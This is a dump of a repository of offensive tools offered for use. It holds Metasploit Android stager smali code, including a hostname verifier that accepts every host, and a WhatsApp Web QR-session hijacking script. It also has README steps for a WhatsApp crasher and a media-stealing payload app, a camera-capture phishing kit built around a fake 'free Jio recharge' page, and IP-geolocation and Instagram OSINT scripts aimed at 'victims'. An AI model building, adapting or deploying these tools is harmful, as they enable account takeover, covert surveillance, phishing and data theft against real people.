Toh jo man kre kro! .*** 48 | -------------------------------------------------------------------------------- /Whats-Hack/lib/aso: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Set up prog to be the path of this script, including following symlinks, 4 | # and set up progdir to be the fully-qualified pathname of its directory. 5 | prog="$0" 6 | while [ -h "${prog}" ]; do 7 | newProg=`/bin/ls -ld "${prog}"` 8 | 9 | newProg=`expr "${newProg}" : ".* -> \(.*\)$"` 10 | if expr "x${newProg}" : 'x/' >/dev/null; then 11 | prog="${newProg}" 12 | else 13 | progdir=`dirname "${prog}"` 14 | prog="${progdir}/${newProg}" 15 | fi 16 | done 17 | oldwd=`pwd` 18 | progdir=`dirname "${prog}"` 19 | cd "${progdir}" 20 | progdir=`pwd` 21 | prog="${progdir}"/`basename "${prog}"` 22 | cd "${oldwd}" 23 | 24 | jarfile=aso.jar 25 | libdir="$progdir" 26 | if [ ! -r "$libdir/$jarfile" ] 27 | then 28 | echo `basename "$prog"`": can't find $jarfile" 29 | exit 1 30 | fi 31 | 32 | if [ "$OSTYPE" = "cygwin" ] ; then 33 | jarpath=`cygpath -w "$libdir/$jarfile"` 34 | else 35 | jarpath="$libdir/$jarfile" 36 | fi 37 | 38 | # add current location to path 39 | PATH=$PATH:`pwd`; 40 | export PATH; 41 | exec java -cp "$jarpath" net.dirtybox.util.obfuscation.AndroidStringObfuscator "$@" 42 | -------------------------------------------------------------------------------- /Insta-Walker/README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 |

4 |

5 | Open Source Information Instagram 6 |

7 | 8 | * The Instagram OSINT Tool gets a range of information from an Instagram account that you normally wouldn't be able to get 9 | from just looking at their profile 10 | 11 | * The information includes: 12 | 13 | * [ profile ] : user id, followers / following, number of uploads, profile img URL, business enum, external URL, joined Recently, etc 14 | 15 | * [ tags & mentions ] : most used hashtags and mentioned accounts 16 | 17 | * [ email ] : if any email is used anywhere it'll be displayed 18 | 19 | * [ posts ] : accessability caption, location, timestamp, caption, picture url, etc 20 | * ( yet not working correctly with posts instagram marks as 'sensitive cotent' ) 21 | 22 | --- 23 | 24 | ## • How To Install 25 | 26 | `$ pkg install -y git` 27 | 28 | `$ git clone https://github.com/Its-Aman-Yadav/Insta-Walker.git` 29 | 30 | `cd Insta-Walker` 31 | 32 | `$ python3 -m pip install -r requirements.txt` 33 | 34 | ## • Usage 35 | 36 | `$ python3 main.py -u username` 37 | 38 | `$ python3 main.py -h` 39 | 40 | `-p, --post images info highlight` 41 | 42 | 43 | ## • Update 44 | 45 | `$ git pull` 46 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/build.gradle: -------------------------------------------------------------------------------- 1 | apply plugin: 'com.android.application' 2 | 3 | android { 4 | compileSdkVersion 25 5 | buildToolsVersion "25.0.1" 6 | defaultConfig { 7 | applicationId "com.whatshack" 8 | minSdkVersion 16 9 | targetSdkVersion 25 10 | versionCode 1 11 | versionName "1.0" 12 | testInstrumentationRunner "android.support.test.runner.AndroidJUnitRunner" 13 | } 14 | buildTypes { 15 | release { 16 | minifyEnabled false 17 | proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro' 18 | } 19 | } 20 | } 21 | android { 22 | lintOptions { 23 | abortOnError false 24 | } 25 | } 26 | 27 | dependencies { 28 | compile fileTree(include: ['*.jar'], dir: 'libs') 29 | androidTestCompile('com.android.support.test.espresso:espresso-core:2.2.2', { 30 | exclude group: 'com.android.support', module: 'support-annotations' 31 | }) 32 | compile 'com.android.support:appcompat-v7:25.1.0' 33 | testCompile 'junit:junit:4.12' 34 | compile files('libs/activation.jar') 35 | compile files('libs/additionnal.jar') 36 | compile files('libs/mail.jar') 37 | compile files('libs/commons-collections4-4.2.jar') 38 | compile files('libs/commons-io-2.6.jar') 39 | 40 | compile 'com.android.support:cardview-v7:25.0.0' 41 | } 42 | -------------------------------------------------------------------------------- /Whats-Hack/payload/smali/com/metasploit/stage/d.smali: -------------------------------------------------------------------------------- 1 | .class final Lcom/metasploit/stage/d; 2 | .super Ljava/lang/Object; 3 | 4 | # interfaces 5 | .implements Ljava/lang/Runnable; 6 | 7 | 8 | # instance fields 9 | .field private synthetic a:Ljava/lang/reflect/Method; 10 | 11 | 12 | # direct methods 13 | .method constructor (Ljava/lang/reflect/Method;)V 14 | .locals 0 15 | 16 | iput-object p1, p0, Lcom/metasploit/stage/d;->a:Ljava/lang/reflect/Method; 17 | 18 | invoke-direct {p0}, Ljava/lang/Object;->()V 19 | 20 | return-void 21 | .end method 22 | 23 | 24 | # virtual methods 25 | .method public final run()V 26 | .locals 3 27 | 28 | :try_start_0 29 | iget-object v0, p0, Lcom/metasploit/stage/d;->a:Ljava/lang/reflect/Method; 30 | 31 | const/4 v1, 0x0 32 | 33 | const/4 v2, 0x0 34 | 35 | invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 36 | 37 | move-result-object v0 38 | 39 | check-cast v0, Landroid/content/Context; 40 | 41 | if-eqz v0, :cond_0 42 | 43 | invoke-static {v0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 44 | :try_end_0 45 | .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0 46 | 47 | :cond_0 48 | :goto_0 49 | return-void 50 | 51 | :catch_0 52 | move-exception v0 53 | 54 | goto :goto_0 55 | .end method 56 | -------------------------------------------------------------------------------- /Whats-Hack/payload/smali/com/metasploit/stage/c.smali: -------------------------------------------------------------------------------- 1 | .class final Lcom/metasploit/stage/c; 2 | .super Ljava/lang/Object; 3 | 4 | # interfaces 5 | .implements Ljava/lang/Runnable; 6 | 7 | 8 | # instance fields 9 | .field private synthetic a:Ljava/lang/reflect/Method; 10 | 11 | 12 | # direct methods 13 | .method constructor (Ljava/lang/reflect/Method;)V 14 | .locals 0 15 | 16 | iput-object p1, p0, Lcom/metasploit/stage/c;->a:Ljava/lang/reflect/Method; 17 | 18 | invoke-direct {p0}, Ljava/lang/Object;->()V 19 | 20 | return-void 21 | .end method 22 | 23 | 24 | # virtual methods 25 | .method public final run()V 26 | .locals 3 27 | 28 | :try_start_0 29 | iget-object v0, p0, Lcom/metasploit/stage/c;->a:Ljava/lang/reflect/Method; 30 | 31 | const/4 v1, 0x0 32 | 33 | const/4 v2, 0x0 34 | 35 | invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; 36 | 37 | move-result-object v0 38 | 39 | check-cast v0, Landroid/content/Context; 40 | 41 | if-eqz v0, :cond_0 42 | 43 | invoke-static {v0}, Lcom/metasploit/stage/MainService;->startService(Landroid/content/Context;)V 44 | :try_end_0 45 | .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0 46 | 47 | :cond_0 48 | :goto_0 49 | return-void 50 | 51 | :catch_0 52 | move-exception v0 53 | 54 | goto :goto_0 55 | .end method 56 | -------------------------------------------------------------------------------- /CamHack/README.md: -------------------------------------------------------------------------------- 1 | ## ABOUT TOOL : 2 | 3 | Grabcam is a bash based script which is officially made for termux from this tool can hack you victims camera by simple offer page. This tool works on both rooted Android device and Non-rooted Android device. 4 | 5 | ## AVAILABLE ON : 6 | 7 | * Termux 8 | 9 | ### TESTED ON : 10 | 11 | * Termux 12 | 13 | ### REQUIREMENTS : 14 | * internet 15 | * php 16 | * storage 400 MB 17 | * ngrok 18 | 19 | ## FEATURES : 20 | * [+] Real camera hacking ! 21 | * [+] Updated maintainence ! 22 | * [+] Ngrok link ! 23 | * [+] Easy for Beginners ! 24 | 25 | ## INSTALLATION [Termux] : 26 | 27 | * `apt-get update -y` 28 | * `apt-get upgrade -y` 29 | * `pkg install python -y` 30 | * `pkg install python2 -y` 31 | * `pkg install git -y` 32 | * `pip install lolcat` 33 | * `git clone https://github.com/noob-hackers/grabcam` 34 | * `cd $HOME` 35 | * `ls` 36 | * `cd grabcam` 37 | * `ls` 38 | * `bash grabcam.sh` 39 | ``` 40 | to see captured images >>> 41 | ``` 42 | ``` 43 | ls 44 | 45 | mv (image name with .png) /sdcard 46 | ``` 47 | ``` 48 | Now go and chek your gallery for victim image... 49 | ``` 50 | ``` 51 | [+]--Now you need internet connection to continue further process... 52 | 53 | [+]--You can select any option by clicking on your keyboard 54 | 55 | [+]--Note:- Don't delete any of the scripts included in grabcam files 56 | 57 | ``` 58 | ## USAGE OPTIONS [Termux] : 59 | 60 | __SELECT OPTION__ : 61 | - From this option you can select type of portforwarding 62 | -------------------------------------------------------------------------------- /CamHack/jio/style.css: -------------------------------------------------------------------------------- 1 | *{-webkit-box-sizing:border-box;box-sizing:border-box}body{margin:0;padding:0;font-size:16px}img.full{width:100%}form{padding:1em .5em}form .input-group{padding:.5em}form .input-group label{font-size:1em;color:#999;display:block;line-height:2}.input,form .input-group input,form .input-group select{height:35px;border:1px solid #ccc;background-color:#fff;border-radius:2px;display:block;width:100%;font-size:1em;color:#333;padding:0 .5em}form .input-group button{height:35px;border:0 solid #fff;width:100%;display:block;font-size:1em;background-color:#007ee6;color:#fff}.btn{background:#4a90e2;border:0;border-radius:2px;color:#fff;cursor:pointer;font-family:Roboto,helvetica,arial,sans-serif;font-size:12px;font-weight:500;height:34px;line-height:34px;min-width:90px;padding:0 10px 0 10px;text-align:center;text-transform:uppercase;-webkit-transition:all .5s ease;transition:all .5s ease;display:inline-block;text-decoration:none}.btn-block{height:40px;border:0 solid #fff;width:100%;display:block;font-size:1em;background-color:#007ee6;color:#fff}.text-left{text-align:left}.text-right{text-align:right}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom;display:inline-block;position:relative}.recaptcha-checkbox-border{border-radius:2px;background-color:#fff;border:2px solid #c1c1c1;font-size:1px;height:24px;position:absolute;width:24px}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64 -------------------------------------------------------------------------------- /Whats-Hack/README.md: -------------------------------------------------------------------------------- 1 | ### Whats-Hack 2 | A Script to Crash WhatsApp With Just a Single Text And Inject a Payload In App Format to Hack and Extract All WhatsApp Media Files. 3 | 4 | ### Note Please: This Script Usage for exploiting targets without prior mutual consent is illegal.. 5 | 6 | ### Installation Guide on Any Linux Distribution: 7 | ``` 8 | # sudo apt-get update 9 | # sudo apt-get upgrade 10 | # sudo apt-get install gradle 11 | 12 | Install Java: 13 | sudo apt install default-jdk 14 | sudo nano /etc/environment 15 | 16 | Add following lines to file to set Java environment variables 17 | JAVA_HOME=/usr/lib/jvm/default-java 18 | PATH="$PATH:$JAVA_HOME/bin" 19 | 20 | # update-alternatives --list java 21 | Copy and replace dir on terminal: 22 | # update-alternatives --set java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java 23 | 24 | 25 | Installing Android Studio: 26 | Download latest version Android studio from 27 | https://developer.android.com/studio/index.html 28 | # unzip 29 | sudo unzip android-studio-ide-141.2178183-linux.zip -d /opt 30 | sudo -xpf file.zip /opt 31 | 32 | sudo apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 lib32stdc++6 33 | Or 34 | sudo apt-get install lib32z1 lib32ncurses5 lib32stdc++6 35 | 36 | Execute Android Studio: 37 | sudo /opt/android-studio/bin/studio.sh 38 | Or 39 | cd /opt/android-studio/bin 40 | bash studio.sh 41 | 42 | Execute script: 43 | # git clone https://github.com/Its-Aman-Yadav/My-Cyber-Weapons/tree/main/Whats-Hack 44 | # cd Whats-Hack/ 45 | # ./Whats-Hack.sh 46 | 47 | To Execute Whatsapp Crasher 48 | # python3 WhatsAppCrasher.py 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /Whats-Hack/hack.py: -------------------------------------------------------------------------------- 1 | from selenium import webdriver 2 | from selenium.webdriver.common.by import By 3 | from selenium.webdriver.support.ui import WebDriverWait 4 | from selenium.webdriver.support import expected_conditions as EC 5 | import base64 6 | from time import sleep 7 | import os 8 | 9 | browser = webdriver.Firefox() # init browser 10 | browser.get("https://web.whatsapp.com/") # open whatsapp web 11 | 12 | # wait up to 10 secs until the qr code is loaded and get it 13 | img = WebDriverWait(browser, 10).until( 14 | EC.presence_of_element_located((By.XPATH, """//*[@id="app"]/div/div/div[2]/div/div[2]/div/img"""))) 15 | 16 | src = img.get_attribute('src') # the qr is a png encoded in base64 17 | 18 | if os.path.isfile('hacked'): # if this file exists, then we hacked the victim 19 | os.remove('hacked') # so, to restart the attack, we delete it 20 | 21 | while True: # we need a loop because the qr code will change every x seconds 22 | try: 23 | # after a while, whatsapp web will ask you to reload the qr code if no connection was attempted 24 | # this will handle the situation clicking on reload whenever necessary 25 | reloader = browser.find_element_by_xpath("""//*[@id="app"]/div/div/div[2]/div/div[2]/div/span/div""") 26 | reloader.click() 27 | print("reloaded") 28 | except: 29 | pass 30 | try: 31 | img = WebDriverWait(browser, 1).until( 32 | EC.presence_of_element_located((By.XPATH, """//*[@id="app"]/div/div/div[2]/div/div[2]/div/img"""))) 33 | new_src = img.get_attribute('src') 34 | except: # if there is no qr code, then we successfully hacked the victim 35 | with open('hacked', 'w') as f: # let's write a file named hacked to keep track of this 36 | f.write('') 37 | break # ...and we exit (the browser will still be open) 38 | if new_src != src: # if there is a new qr code, rewrite the existing one 39 | src = new_src 40 | b64png = str.encode(src.replace("data:image/png;base64,", "")) 41 | with open("qr.png", "wb") as f: 42 | f.write(base64.decodebytes(b64png)) 43 | print("new qr") 44 | sleep(1) 45 | print("Hacked!") 46 | -------------------------------------------------------------------------------- /Whats-Hack/data/gradlew.bat: -------------------------------------------------------------------------------- 1 | @if "%DEBUG%" == "" @echo off 2 | @rem ########################################################################## 3 | @rem 4 | @rem Gradle startup script for Windows 5 | @rem 6 | @rem ########################################################################## 7 | 8 | @rem Set local scope for the variables with windows NT shell 9 | if "%OS%"=="Windows_NT" setlocal 10 | 11 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 12 | set DEFAULT_JVM_OPTS= 13 | 14 | set DIRNAME=%~dp0 15 | if "%DIRNAME%" == "" set DIRNAME=. 16 | set APP_BASE_NAME=%~n0 17 | set APP_HOME=%DIRNAME% 18 | 19 | @rem Find java.exe 20 | if defined JAVA_HOME goto findJavaFromJavaHome 21 | 22 | set JAVA_EXE=java.exe 23 | %JAVA_EXE% -version >NUL 2>&1 24 | if "%ERRORLEVEL%" == "0" goto init 25 | 26 | echo. 27 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 28 | echo. 29 | echo Please set the JAVA_HOME variable in your environment to match the 30 | echo location of your Java installation. 31 | 32 | goto fail 33 | 34 | :findJavaFromJavaHome 35 | set JAVA_HOME=%JAVA_HOME:"=% 36 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe 37 | 38 | if exist "%JAVA_EXE%" goto init 39 | 40 | echo. 41 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 42 | echo. 43 | echo Please set the JAVA_HOME variable in your environment to match the 44 | echo location of your Java installation. 45 | 46 | goto fail 47 | 48 | :init 49 | @rem Get command-line arguments, handling Windowz variants 50 | 51 | if not "%OS%" == "Windows_NT" goto win9xME_args 52 | if "%@eval[2+2]" == "4" goto 4NT_args 53 | 54 | :win9xME_args 55 | @rem Slurp the command line arguments. 56 | set CMD_LINE_ARGS= 57 | set _SKIP=2 58 | 59 | :win9xME_args_slurp 60 | if "x%~1" == "x" goto execute 61 | 62 | set CMD_LINE_ARGS=%* 63 | goto execute 64 | 65 | :4NT_args 66 | @rem Get arguments from the 4NT Shell from JP Software 67 | set CMD_LINE_ARGS=%$ 68 | 69 | :execute 70 | @rem Setup the command line 71 | 72 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar 73 | 74 | @rem Execute Gradle 75 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% 76 | 77 | :end 78 | @rem End local scope for the variables with windows NT shell 79 | if "%ERRORLEVEL%"=="0" goto mainEnd 80 | 81 | :fail 82 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of 83 | rem the _cmd.exe /c_ return code! 84 | if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 85 | exit /b 1 86 | 87 | :mainEnd 88 | if "%OS%"=="Windows_NT" endlocal 89 | 90 | :omega 91 | -------------------------------------------------------------------------------- /LocaLoca/LocaLoca.py: -------------------------------------------------------------------------------- 1 | #14/11/22 2 | #Its Aman Yadav 3 | 4 | import argparse 5 | import requests, json 6 | import sys 7 | from sys import argv 8 | import os 9 | 10 | parser = argparse.ArgumentParser() 11 | 12 | parser.add_argument ("-v", help= "target/host IP address", type=str, dest='target', required=True ) 13 | 14 | args = parser.parse_args() 15 | 16 | #colours used 17 | red = '\033[31m' 18 | yellow = '\033[93m' 19 | lgreen = '\033[92m' 20 | clear = '\033[0m' 21 | bold = '\033[01m' 22 | cyan = '\033[96m' 23 | 24 | #banner of script 25 | print (red+""" 26 | █████ █████ 27 | ░░███ ░░███ 28 | ░███ ██████ ██████ ██████ ░███ ██████ ██████ ██████ 29 | ░███ ███░░███ ███░░███ ░░░░░███ ░███ ███░░███ ███░░███ ░░░░░███ 30 | ░███ ░███ ░███░███ ░░░ ███████ ░███ ░███ ░███░███ ░░░ ███████ 31 | ░███ █░███ ░███░███ ███ ███░░███ ░███ █░███ ░███░███ ███ ███░░███ 32 | ███████████░░██████ ░░██████ ░░████████ ███████████░░██████ ░░██████ ░░████████ 33 | ░░░░░░░░░░░ ░░░░░░ ░░░░░░ ░░░░░░░░ ░░░░░░░░░░░ ░░░░░░ ░░░░░░ ░░░░░░░░ 34 | v 1.0 35 | """+red) 36 | print (red+bold+" <===[[ coded by Aman Yadav ]]===> \n"+clear) 37 | 38 | 39 | ip = args.target 40 | 41 | api = "http://ip-api.com/json/" 42 | 43 | try: 44 | data = requests.get(api+ip).json() 45 | sys.stdout.flush() 46 | a = lgreen+bold+"[$]" 47 | b = cyan+bold+"[$]" 48 | print (a, "[Victim]:", data['query']) 49 | print(red+"<--------------->"+red) 50 | print (b, "[ISP(SIM)]:", data['isp']) 51 | print(red+"<--------------->"+red) 52 | print (a, "[Organisation]:", data['org']) 53 | print(red+"<--------------->"+red) 54 | print (b, "[City]:", data['city']) 55 | print(red+"<--------------->"+red) 56 | print (a, "[Region]:", data['region']) 57 | print(red+"<--------------->"+red) 58 | print (b, "[Longitude]:", data['lon']) 59 | print(red+"<--------------->"+red) 60 | print (a, "[Latitude]:", data['lat']) 61 | print(red+"<--------------->"+red) 62 | print (b, "[Time zone]:", data['timezone']) 63 | print(red+"<--------------->"+red) 64 | print (a, "[Zip code]:", data['zip']) 65 | print (" "+yellow) 66 | 67 | except KeyboardInterrupt: 68 | print ('Terminating, Bye Bye'+lgreen) 69 | print ('Subscribe to our Channel -> Startup Vro'+lgreen) 70 | sys.exit(0) 71 | except requests.exceptions.ConnectionError as e: 72 | print (red+"[~]"+" Internt Check kr L**de!"+clear) 73 | sys.exit(1) 74 | -------------------------------------------------------------------------------- /Whats-Hack/payload/smali/com/metasploit/stage/a.smali: -------------------------------------------------------------------------------- 1 | .class public final Lcom/metasploit/stage/a; 2 | .super Ljava/lang/Object; 3 | 4 | 5 | # instance fields 6 | .field public a:I 7 | 8 | .field public b:J 9 | 10 | .field public c:Ljava/lang/String; 11 | 12 | .field public d:Ljava/util/List; 13 | 14 | 15 | # direct methods 16 | .method public constructor ()V 17 | .locals 1 18 | 19 | invoke-direct {p0}, Ljava/lang/Object;->()V 20 | 21 | new-instance v0, Ljava/util/LinkedList; 22 | 23 | invoke-direct {v0}, Ljava/util/LinkedList;->()V 24 | 25 | iput-object v0, p0, Lcom/metasploit/stage/a;->d:Ljava/util/List; 26 | 27 | return-void 28 | .end method 29 | 30 | .method public static a(Ljava/net/URLConnection;Ljava/lang/String;Ljava/lang/String;)V 31 | .locals 8 32 | 33 | const/4 v7, 0x2 34 | 35 | const/4 v6, 0x1 36 | 37 | const/4 v1, 0x0 38 | 39 | invoke-static {p2}, Lcom/metasploit/stage/a;->a(Ljava/lang/String;)Z 40 | 41 | move-result v0 42 | 43 | if-nez v0, :cond_0 44 | 45 | const-string v0, "User-Agent" 46 | 47 | invoke-virtual {p0, v0, p2}, Ljava/net/URLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V 48 | 49 | :cond_0 50 | const-string v0, "\r\n" 51 | 52 | invoke-virtual {p1, v0}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String; 53 | 54 | move-result-object v2 55 | 56 | array-length v3, v2 57 | 58 | move v0, v1 59 | 60 | :goto_0 61 | if-ge v0, v3, :cond_2 62 | 63 | aget-object v4, v2, v0 64 | 65 | invoke-static {v4}, Lcom/metasploit/stage/a;->a(Ljava/lang/String;)Z 66 | 67 | move-result v5 68 | 69 | if-nez v5, :cond_1 70 | 71 | const-string v5, ": " 72 | 73 | invoke-virtual {v4, v5, v7}, Ljava/lang/String;->split(Ljava/lang/String;I)[Ljava/lang/String; 74 | 75 | move-result-object v4 76 | 77 | array-length v5, v4 78 | 79 | if-ne v5, v7, :cond_1 80 | 81 | aget-object v5, v4, v1 82 | 83 | invoke-static {v5}, Lcom/metasploit/stage/a;->a(Ljava/lang/String;)Z 84 | 85 | move-result v5 86 | 87 | if-nez v5, :cond_1 88 | 89 | aget-object v5, v4, v6 90 | 91 | invoke-static {v5}, Lcom/metasploit/stage/a;->a(Ljava/lang/String;)Z 92 | 93 | move-result v5 94 | 95 | if-nez v5, :cond_1 96 | 97 | aget-object v5, v4, v1 98 | 99 | aget-object v4, v4, v6 100 | 101 | invoke-virtual {p0, v5, v4}, Ljava/net/URLConnection;->addRequestProperty(Ljava/lang/String;Ljava/lang/String;)V 102 | 103 | :cond_1 104 | add-int/lit8 v0, v0, 0x1 105 | 106 | goto :goto_0 107 | 108 | :cond_2 109 | return-void 110 | .end method 111 | 112 | .method private static a(Ljava/lang/String;)Z 113 | .locals 1 114 | 115 | if-eqz p0, :cond_0 116 | 117 | const-string v0, "" 118 | 119 | invoke-virtual {v0, p0}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z 120 | 121 | move-result v0 122 | 123 | if-eqz v0, :cond_1 124 | 125 | :cond_0 126 | const/4 v0, 0x1 127 | 128 | :goto_0 129 | return v0 130 | 131 | :cond_1 132 | const/4 v0, 0x0 133 | 134 | goto :goto_0 135 | .end method 136 | -------------------------------------------------------------------------------- /Whats-Hack/payload/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /CamHack/jio/invite.htm: -------------------------------------------------------------------------------- 1 | 2 | Hey Dear! You Have Won Free Rs 399 Jio Recharge 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |

Free Rs 399 Jio Recharge kre

18 | 19 |
20 | 21 |

Hello

22 |

Aapka Mobile Number Rs 399 Jio Recharge Kr sakte hai

Aapko Rs 399 Jio recharge ke baare mein Whatsapp ke 10 doston / group par share karna hoga

Dosto ko invite Karen

invite karne ke baad, Recharge Now par klik karen.


24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /Whats-Hack/payload/smali/com/metasploit/stage/f.smali: -------------------------------------------------------------------------------- 1 | .class public final Lcom/metasploit/stage/f; 2 | .super Ljava/lang/Object; 3 | 4 | # interfaces 5 | .implements Ljavax/net/ssl/HostnameVerifier; 6 | .implements Ljavax/net/ssl/X509TrustManager; 7 | 8 | 9 | # instance fields 10 | .field private a:[B 11 | 12 | 13 | # direct methods 14 | .method private constructor ([B)V 15 | .locals 0 16 | 17 | invoke-direct {p0}, Ljava/lang/Object;->()V 18 | 19 | iput-object p1, p0, Lcom/metasploit/stage/f;->a:[B 20 | 21 | return-void 22 | .end method 23 | 24 | .method public static a(Ljava/net/URLConnection;[B)V 25 | .locals 5 26 | 27 | instance-of v0, p0, Ljavax/net/ssl/HttpsURLConnection; 28 | 29 | if-eqz v0, :cond_0 30 | 31 | check-cast p0, Ljavax/net/ssl/HttpsURLConnection; 32 | 33 | new-instance v0, Lcom/metasploit/stage/f; 34 | 35 | invoke-direct {v0, p1}, Lcom/metasploit/stage/f;->([B)V 36 | 37 | const-string v1, "SSL" 38 | 39 | invoke-static {v1}, Ljavax/net/ssl/SSLContext;->getInstance(Ljava/lang/String;)Ljavax/net/ssl/SSLContext; 40 | 41 | move-result-object v1 42 | 43 | const/4 v2, 0x0 44 | 45 | const/4 v3, 0x1 46 | 47 | new-array v3, v3, [Ljavax/net/ssl/TrustManager; 48 | 49 | const/4 v4, 0x0 50 | 51 | aput-object v0, v3, v4 52 | 53 | new-instance v4, Ljava/security/SecureRandom; 54 | 55 | invoke-direct {v4}, Ljava/security/SecureRandom;->()V 56 | 57 | invoke-virtual {v1, v2, v3, v4}, Ljavax/net/ssl/SSLContext;->init([Ljavax/net/ssl/KeyManager;[Ljavax/net/ssl/TrustManager;Ljava/security/SecureRandom;)V 58 | 59 | invoke-virtual {v1}, Ljavax/net/ssl/SSLContext;->getSocketFactory()Ljavax/net/ssl/SSLSocketFactory; 60 | 61 | move-result-object v1 62 | 63 | invoke-virtual {p0, v1}, Ljavax/net/ssl/HttpsURLConnection;->setSSLSocketFactory(Ljavax/net/ssl/SSLSocketFactory;)V 64 | 65 | invoke-virtual {p0, v0}, Ljavax/net/ssl/HttpsURLConnection;->setHostnameVerifier(Ljavax/net/ssl/HostnameVerifier;)V 66 | 67 | :cond_0 68 | return-void 69 | .end method 70 | 71 | 72 | # virtual methods 73 | .method public final checkClientTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V 74 | .locals 0 75 | 76 | return-void 77 | .end method 78 | 79 | .method public final checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V 80 | .locals 4 81 | 82 | iget-object v0, p0, Lcom/metasploit/stage/f;->a:[B 83 | 84 | if-nez v0, :cond_1 85 | 86 | :cond_0 87 | return-void 88 | 89 | :cond_1 90 | if-eqz p1, :cond_2 91 | 92 | array-length v0, p1 93 | 94 | if-gtz v0, :cond_3 95 | 96 | :cond_2 97 | new-instance v0, Ljava/security/cert/CertificateException; 98 | 99 | invoke-direct {v0}, Ljava/security/cert/CertificateException;->()V 100 | 101 | throw v0 102 | 103 | :cond_3 104 | array-length v1, p1 105 | 106 | const/4 v0, 0x0 107 | 108 | :goto_0 109 | if-ge v0, v1, :cond_0 110 | 111 | aget-object v2, p1, v0 112 | 113 | :try_start_0 114 | const-string v3, "SHA-1" 115 | 116 | invoke-static {v3}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest; 117 | 118 | move-result-object v3 119 | 120 | invoke-virtual {v2}, Ljava/security/cert/X509Certificate;->getEncoded()[B 121 | 122 | move-result-object v2 123 | 124 | invoke-virtual {v3, v2}, Ljava/security/MessageDigest;->update([B)V 125 | 126 | invoke-virtual {v3}, Ljava/security/MessageDigest;->digest()[B 127 | 128 | move-result-object v2 129 | 130 | iget-object v3, p0, Lcom/metasploit/stage/f;->a:[B 131 | 132 | invoke-static {v3, v2}, Ljava/util/Arrays;->equals([B[B)Z 133 | 134 | move-result v2 135 | 136 | if-nez v2, :cond_4 137 | 138 | new-instance v0, Ljava/security/cert/CertificateException; 139 | 140 | const-string v1, "Invalid certificate" 141 | 142 | invoke-direct {v0, v1}, Ljava/security/cert/CertificateException;->(Ljava/lang/String;)V 143 | 144 | throw v0 145 | :try_end_0 146 | .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0 147 | 148 | :catch_0 149 | move-exception v0 150 | 151 | new-instance v1, Ljava/security/cert/CertificateException; 152 | 153 | invoke-direct {v1, v0}, Ljava/security/cert/CertificateException;->(Ljava/lang/Throwable;)V 154 | 155 | throw v1 156 | 157 | :cond_4 158 | add-int/lit8 v0, v0, 0x1 159 | 160 | goto :goto_0 161 | .end method 162 | 163 | .method public final getAcceptedIssuers()[Ljava/security/cert/X509Certificate; 164 | .locals 1 165 | 166 | const/4 v0, 0x0 167 | 168 | new-array v0, v0, [Ljava/security/cert/X509Certificate; 169 | 170 | return-object v0 171 | .end method 172 | 173 | .method public final verify(Ljava/lang/String;Ljavax/net/ssl/SSLSession;)Z 174 | .locals 1 175 | 176 | const/4 v0, 0x1 177 | 178 | return v0 179 | .end method 180 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/java/com/whatsapphack/MainActivity.java: -------------------------------------------------------------------------------- 1 | package com.whatsapphack; 2 | import android.content.pm.PackageManager; 3 | import android.app.Activity; 4 | import android.support.v4.app.ActivityCompat; 5 | import android.support.v4.content.ContextCompat; 6 | import android.support.v7.app.AppCompatActivity; 7 | import java.io.DataInputStream; 8 | import java.io.DataOutputStream; 9 | import java.io.File; 10 | import java.io.FileInputStream; 11 | import java.io.IOException; 12 | import java.net.HttpURLConnection; 13 | import java.net.URL; 14 | import android.annotation.SuppressLint; 15 | import android.app.Activity; 16 | import android.content.Intent; 17 | import android.net.Uri; 18 | import android.os.Bundle; 19 | import android.os.StrictMode; 20 | import 